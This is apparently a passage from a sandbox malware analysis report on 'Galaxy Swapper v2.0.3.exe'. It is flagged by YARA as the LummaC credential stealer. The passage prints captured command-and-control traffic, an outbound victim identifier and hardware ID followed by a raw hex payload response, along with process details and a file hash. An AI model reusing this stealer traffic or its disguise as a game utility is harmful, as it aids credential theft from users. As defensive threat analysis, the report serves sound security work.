2025-03-13 09:20:04 UTC	99	OUT	Data Raw: 75 69 64 3d 63 65 62 31 32 61 35 35 65 61 36 66 64 39 38 39 30 64 63 64 65 35 66 31 35 64 33 62 30 33 36 39 63 35 30 32 32 62 35 65 65 39 39 38 34 37 62 30 34 61 61 66 26 63 69 64 3d 26 68 77 69 64 3d 34 33 36 31 35 46 46 46 35 38 43 30 42 45 44 44 34 42 30 43 41 36 42 45 32 43 36 30 31 38 46 42 Data Ascii: uid=ceb12a55ea6fd9890dcde5f15d3b0369c5022b5ee99847b04aaf&cid=&hwid=43615FFF58C0BEDD4B0CA6BE2C6018FB
2025-03-13 09:20:04 UTC	779	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 09:20:04 GMT Content-Type: application/octet-stream Content-Length: 10554 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xoEvpzGpsValkt8YIkD1D1grGnvs7IHU999EKMNdVnsaz7lQMVc1U7CYxWDKU61lRHPvG%2BaIUNogq1Y%2BS%2Fz1ew07%2BPDmS4igmXfBPHypgif3IORQ4j4vTyzYhWQbhxhT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fa740c2b19c434-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=32317&min_rtt=31941&rtt_var=9635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=998&delivery_rate=86321&cwnd=250&unsent_bytes=0&cid=22681bfaef4527b5&ts=869&x=0"
2025-03-13 09:20:04 UTC	590	IN	Data Raw: 85 3e 65 14 d0 b4 2c 78 64 5a ff bc d0 11 30 2f c8 9a 8b 6e 0a 24 85 47 26 73 f7 e2 a7 64 ee b6 c4 4d b8 0b 94 28 d6 b1 ca 6b f4 fa 70 f3 33 87 93 8a 56 ef 5d 98 14 fc e9 83 dc 07 a7 3b f7 fc 78 c8 ca 4d 35 13 c5 f9 ae 98 a5 c7 23 bf 9a c5 c1 97 a7 23 0d 88 6a 02 fa 34 2d 53 d8 07 3c 22 98 c3 a0 17 53 68 14 bb 24 8d 1e 22 ad 63 8e 5d 49 bc 60 10 43 cf ec 54 16 a4 0e 41 ee cf e6 8e bc b0 b6 11 38 17 7f 18 11 ce 0d e1 86 53 60 c8 d3 62 03 15 8f df 67 f2 80 19 a5 37 c6 f9 4d 4a d3 95 90 79 5a 41 49 ab 38 95 e1 8c 85 45 a3 82 b7 a5 ac fa 9c 14 ba 96 84 8b 5e 58 48 dc d8 8d a1 9e 7a b4 9e bb 26 15 2f ea bb 30 d4 4c 3c e9 db 16 57 d6 15 d8 fb 7a 3c c1 4c 8d de bf f2 76 f8 6b 03 96 f4 27 31 58 0f 17 bc e0 55 43 fd 76 9c c3 b0 dc 66 d5 ea ec 03 bd d1 57 08 90 8e Data Ascii: >e,xdZ0/n$G&sdM(kp3V];xM5##j4-S<"Sh$"c]I`CTA8S`bg7MJyZAI8E^XHz&/0L<Wz<Lvk'1XUCvfW
2025-03-13 09:20:04 UTC	1369	IN	Data Raw: 83 d0 fb 56 0f 88 45 be ce 71 34 32 92 f4 78 d5 1f 12 f4 c3 76 89 2a 84 b8 1f e1 43 25 54 f0 72 68 9d cc e8 fb 4f db e5 e0 5f 48 5c 06 36 13 d2 b4 6f 5c ee 19 e8 3f ec f7 29 18 f1 e1 b3 e2 c2 e9 98 5d 2b 64 02 d7 5a ee 69 a9 ae 1b 4d b6 4f 49 d5 2b 1a c3 27 1f ea 68 83 0e ff 45 cb 40 85 36 69 2e e5 b5 d1 f0 e5 da d8 2b 6c 03 4a cb 24 46 97 90 18 e6 24 0b 3d 9a 0f 6d b4 96 42 05 10 fa fc ca 02 7b c4 41 6f b8 3d a1 b0 a7 13 f2 eb ca 90 a8 56 eb 2d e1 12 26 f3 73 ed 97 2f e9 57 7f dd 44 a5 d0 09 b7 7a d5 b9 14 5a 5b 7e e0 84 c1 ad 15 c1 83 bc 5e d4 17 46 f4 63 a4 f3 b2 26 38 ec 18 37 db 82 b7 03 30 96 41 f1 f4 b4 52 61 0e 47 bc 19 0c 1d 2c 7c 7e 77 76 1c bb 52 a3 c8 0f 0a 8e 10 4b 9a cb 7c e2 43 0e c1 dd fe b5 6f d2 8d 20 7a 71 ea fa a7 5e 3b 59 12 62 fa fb Data Ascii: VEq42xv*C%TrhO_H\6o\?)]+dZiMOI+'hE@6i.+lJ$F$=mB{Ao=V-&s/WDzZ[~^Fc&870ARaG,\|~wvRK\|Co zq^;Yb
2025-03-13 09:20:04 UTC	1369	IN	Data Raw: 5e 42 2b de ec 86 7f a6 63 b0 af 66 43 3f d0 e5 1a 3d 40 6a 8e f5 2e b9 6f 9d de 53 f9 78 c9 07 02 62 08 83 56 46 3f 4a 56 48 3c 5e d2 ff 11 86 49 f3 3f 19 00 06 3f 96 34 c5 78 c6 9b 88 55 10 42 f6 2a c6 cd 29 95 d2 3c d7 48 4a bb a9 90 80 ec e3 73 d8 30 62 5b 5c a2 49 b0 06 2d 5e c6 3d 72 3b 15 f4 87 6c c6 81 3b 52 cd 11 be 09 b4 61 ef be 3d 68 4a a5 a6 91 87 4d d5 53 d3 16 11 82 02 46 5d 60 0b ac 57 f5 d4 f4 88 75 fc 4c 77 42 28 b3 a0 df ae ab cd 75 da ce fb f1 91 ea 05 8b 63 41 15 a9 37 e5 5e 41 55 c1 ef e1 55 b4 6a 72 19 0f 9e 35 4c cc be 46 85 ed cb 1b 81 6f 29 1d fd a0 0b b7 ef 51 f0 aa af 5e 56 2b f6 3d 17 e3 56 32 5c d3 d7 8f 5d 93 b3 4f e0 ba b5 18 0f fb 65 56 89 1d 8c 28 b3 81 86 87 d8 bd 6d a7 e0 6e 58 5c c4 c7 49 21 88 f1 30 52 f2 f2 af 6b 38 Data Ascii: ^B+cfC?=@j.oSxbVF?JVH<^I??4xUB*)<HJs0b[\I-^=r;l;Ra=hJMSF]`WuLwB(ucA7^AUUjr5LFo)Q^V+=V2\]OeV(mnX\I!0Rk8
2025-03-13 09:20:04 UTC	1369	IN	Data Raw: 84 60 7a 51 5f 8f 18 4c e3 65 83 a6 67 eb 9f f9 12 34 59 19 fc 64 28 b6 e0 fc e1 9d 65 60 d1 5c 84 a1 9d a6 79 ad 36 4d 91 94 37 92 41 60 be 02 d3 3b 4b 34 90 9e 23 4d 0b 8b ea d2 c4 f8 ac f8 f4 45 76 a0 52 46 64 93 7a 9f 30 c9 32 20 be 48 05 8c 9c d3 72 1b 58 d0 ec 18 ca ef 26 e8 83 9c aa 48 33 74 01 03 3c 1d aa 33 4f bc 3f 8b 05 e1 6f e1 bb 7a 8d e6 f1 09 ac 69 c2 76 08 08 dd fb f1 8d da 41 de 87 c1 86 34 80 dc a9 da a5 a8 ff ac 99 90 81 44 af 75 cc b8 9d f6 90 73 a3 b0 42 9e ab 3d f0 f1 bb cc 24 b2 d0 b9 0c 66 0c cc b7 8f 3d 1d 6d ee 7d 1b e0 d5 61 f0 be b9 5a 34 47 62 06 0e 8a 81 f9 1a d4 86 c7 61 60 57 9d 2c 56 b8 8e 23 39 46 29 78 fd ae a7 18 eb 21 de 5c 73 91 bc a3 7a d0 46 c5 0c a3 a1 ae 65 f7 31 a3 8d e6 a2 64 bd 67 28 27 75 30 f9 28 73 bc dd 57 Data Ascii: `zQ_Leg4Yd(e`\y6M7A`;K4#MEvRFdz02 HrX&H3t<3O?ozivA4DusB=$f=m}aZ4Gba`W,V#9F)x!\szFe1dg('u0(sW
2025-03-13 09:20:05 UTC	1369	IN	Data Raw: c0 44 f5 90 0b c5 90 f3 cc a7 bd 61 07 dd 8a 79 ba 74 bd df ac bb b3 6d 8f 45 2e d0 9d 1a 20 09 c6 95 af 14 19 61 26 07 61 67 b5 7b 58 c8 d6 93 f4 88 bc 3a 4d 81 1f 1c ef 13 37 54 52 31 6f 5d a4 8c 70 ba ae cc d9 bd 9c d3 24 18 34 33 41 9f 68 be a0 5b 29 2c e3 f4 c1 ae f4 c3 8d 08 77 cb 4d a5 09 cc c4 3e 1f 64 ed ac 3f 1d 68 37 f9 59 8d 52 55 44 f3 d1 5b ca c5 16 b9 52 cb 1b 2f 44 26 fc 39 c0 e2 45 ad 0e c2 bb 35 16 fa e8 6d 2c ff 09 89 9b c3 54 86 64 77 9d e4 bb 2a 57 94 3f af 74 40 a3 66 6e 64 fa 0c 3e 7d 12 9d 0a e5 bf d4 22 a1 c4 6b bd d9 ab dc 9c 03 e9 2f d6 2a 63 a2 85 9f 39 9e 60 81 ce 3f 07 29 0d 95 3d 78 47 fd 59 a0 09 c6 09 15 6f b7 2e eb 83 97 c1 7b e5 00 bd ab 74 f2 c8 16 88 a5 ba c8 c9 1a cf d6 55 d6 c0 18 2c c8 cc dd d5 bc bf 5c ff 69 ba 63 Data Ascii: DaytmE. a&ag{X:M7TR1o]p$43Ah[),wM>d?h7YRUD[R/D&9E5m,TdwW?t@fnd>}"k/c9`?)=xGYo.{tU,\ic
2025-03-13 09:20:05 UTC	1369	IN	Data Raw: ba e3 0a 55 72 18 83 53 4b 05 bd 88 8d d8 6a 4f 44 93 42 33 8b 1c e1 5f 71 f8 5e 35 5f a9 03 77 47 e8 55 8b ac 79 c4 af 29 96 32 b8 ca e5 fc 3c d2 01 4d f2 96 f4 47 aa 3b 89 33 da a1 17 05 97 e4 d8 41 9e cf dd 87 ba 93 9d fb eb 90 ec 24 c6 bb e3 54 2e b0 2c cc eb 22 cd 33 2f 4f bf 85 4f 6f a3 73 3d 1f 33 84 06 40 8d 1d cf e1 71 bf 30 ad e9 cc 37 7e 79 33 2d 47 07 ff 23 50 4f e1 0a a0 4f d9 f4 7e 77 f0 38 22 4f 1e 29 3f 1d c8 71 80 d5 d8 7d 39 ea e8 04 fa 60 9f f3 52 9a bf 09 48 ab 70 99 b4 2e 15 23 13 fb ec 6f ce 00 c4 d3 d9 f2 34 f6 9c 22 b4 65 a5 54 ef 16 aa 4d 99 14 e3 a3 a0 2e e2 ba d6 34 89 06 6c d2 87 a9 8c ed 36 2d f1 a1 43 e3 55 1b f1 b7 8b 8a 78 09 26 db 6e b2 18 86 0f c0 ad 7c 89 cc d6 b3 af 01 a6 6c f5 52 68 f0 43 c4 89 26 3e dc c3 eb 10 a5 17 Data Ascii: UrSKjODB3_q^5_wGUy)2<MG;3A$T.,"3/OOos=3@q07~y3-G#POO~w8"O)?q}9`RHp.#o4"eTM.4l6-CUx&n\|lRhC&>
2025-03-13 09:20:05 UTC	1369	IN	Data Raw: 5f dd 97 0f d0 80 0b 50 f4 82 fd e5 66 29 59 17 e8 51 af b0 e5 e7 2c 76 31 91 33 5b d3 fd b1 7f 80 5c 72 f1 45 0b 24 8f 1d 0b f0 ef 1a d7 75 48 73 94 0e d0 b9 c2 6b 11 0a 49 49 37 ca de 36 6f 0b 26 87 b8 bf b8 51 a7 f1 14 bb 2a c1 ae 6d 27 aa de 46 9f f1 26 f7 6e 4f 27 53 b5 63 c5 af 8f 05 61 66 e3 19 62 aa 1b 25 48 07 37 3e c0 21 69 1d 54 99 89 3c b0 1c 65 c3 48 58 1f e0 9b 62 2a 44 1d 60 c5 e5 cf dd 1b 52 ae 7f 8a 35 75 71 3f fd 11 3f 23 aa f2 de b9 0d fa 61 4e a3 1b 5b 97 c7 2e 15 c4 ae 78 0f be 68 0c 45 81 ca d7 15 8a 08 1d db a5 2b d8 3d 8b 24 43 0a 03 5c 37 c2 dc 47 48 5a eb 0f cd 39 33 ed b1 e3 e2 56 a0 76 62 b1 9b 6a cf 26 88 97 cd b5 12 1e 87 05 6b 74 92 94 99 28 24 d6 32 04 ab a9 3d 0a f9 8d 47 73 71 db 1b b4 dd 63 97 e1 fc 6f a2 19 f1 1d ed 3c Data Ascii: _Pf)YQ,v13[\rE$uHskII76o&Qm'F&nO'Scafb%H7>!iT<eHXbD`R5uq??#aN[.xhE+=$C\7GHZ93Vvbj&kt($2=Gsqco<
2025-03-13 09:20:05 UTC	1369	IN	Data Raw: 7f e6 e6 a6 14 30 c4 a9 2d 9c 49 1e 41 bc 72 4b 73 81 c0 89 83 d0 bc c7 c4 3d 42 31 36 ad f8 aa 7d 9f 73 6a 91 f9 d0 82 39 81 ea 30 d2 93 ea 91 4b 10 81 06 c0 0e 22 84 1a 28 b1 d1 6b 4a 0b 09 47 a9 95 2f c8 cc 69 1c 2b e7 b7 9d b5 2a e0 bb b8 73 6d 81 7f 63 bc bb 15 44 16 81 a8 50 4c 2a c3 e7 b7 27 ec bf 53 55 c1 1a 47 8f 5b 33 2a 40 b8 b3 61 cc 86 0a 7d 44 e4 f5 63 ee 9e 70 83 72 9b 76 bc 33 23 2c 70 c8 9e 62 4a ab 59 94 43 9d a5 89 b9 8c 1c f5 a7 29 89 49 76 85 ff 92 a9 e5 e3 d9 72 3c 02 59 52 dd 05 43 55 be de 1a 5e ee 02 44 cc b7 00 44 52 00 c2 e7 d8 d3 8a 3b 60 9c cf 96 7b 11 31 d7 e9 4d b5 67 fb 92 49 99 b3 06 5c 5f d0 b8 78 57 32 5c 9c 45 ac 91 7f 0d 8b b5 67 2c 83 06 b6 21 b1 da b5 d2 e7 3d 61 03 d8 b2 b6 82 be a9 69 7a 9b 4c a4 f1 f0 cb ee 37 8d Data Ascii: 0-IArKs=B16}sj90K"(kJG/i+smcDPL'SUG[3*@a}Dcprv3#,pbJYC)Ivr<YRCU^DDR;`{1MgI\_xW2\Eg,!=aizL7
2025-03-13 09:20:05 UTC	381	IN	Data Raw: e6 8e 08 54 e1 9f c7 aa 50 f4 40 a2 9f 56 ae e2 90 9c 59 c9 83 60 d1 b8 7d ab fc 36 bb 0f 60 19 2b d3 94 9b a2 23 92 fa bb 9a 57 ae b4 02 3d c8 1f f5 1b e1 93 74 45 3e 99 46 41 99 40 01 5d ea f0 9f 9a f8 17 cf f6 b7 49 dc 02 37 64 5a 70 34 fc 63 79 fa 5e ca 54 1b 0e fe dd 0d d0 01 f3 a8 ef a6 3b 6f 12 84 51 3d 3d cd df 8a a2 f7 e2 70 ca 64 64 f7 12 7b 04 70 fc 8f e0 a5 5a 79 cb 93 38 f8 6a a5 f5 a7 74 59 ca 4d c8 2e c4 54 c6 57 3a 43 77 42 f1 ac d0 23 af f5 a1 12 66 6c 2a e5 10 40 d4 ad 58 8e 64 44 c2 c2 d7 83 cc 59 92 3e 1d 89 45 49 7a 3d 01 7c b1 ef 16 77 f3 52 d1 33 73 c2 51 40 4d 52 9d ef 87 46 a9 ea a0 47 5f 9d cd ba f6 73 4f 13 2c 51 a9 f9 5f ff 90 d9 bc 89 b0 79 39 bc 7b 90 e4 c4 88 9f da 0c 90 02 bb 39 41 5c 64 6c dc f4 e9 30 f2 92 cf 5a 3a 57 7a Data Ascii: TP@VY`}6`+#W=tE>FA@]I7dZp4cy^T;oQ==pdd{pZy8jtYM.TW:CwB#fl*@XdDY>EIz=\|wR3sQ@MRFG_sO,Q_y9{9A\dl0Z:Wz

Target ID:	0
Start time:	05:19:39
Start date:	13/03/2025
Path:	C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe"
Imagebase:	0xf00000
File size:	778'560 bytes
MD5 hash:	36ECBD776704A4884F9978275E1BD271
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.916483923.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:19:40
Start date:	13/03/2025
Path:	C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe"
Imagebase:	0xf00000
File size:	778'560 bytes
MD5 hash:	36ECBD776704A4884F9978275E1BD271
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1043714845.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2172856527.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Galaxy Swapper v2.0.3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
Galaxy Swapper v2.0.3.exe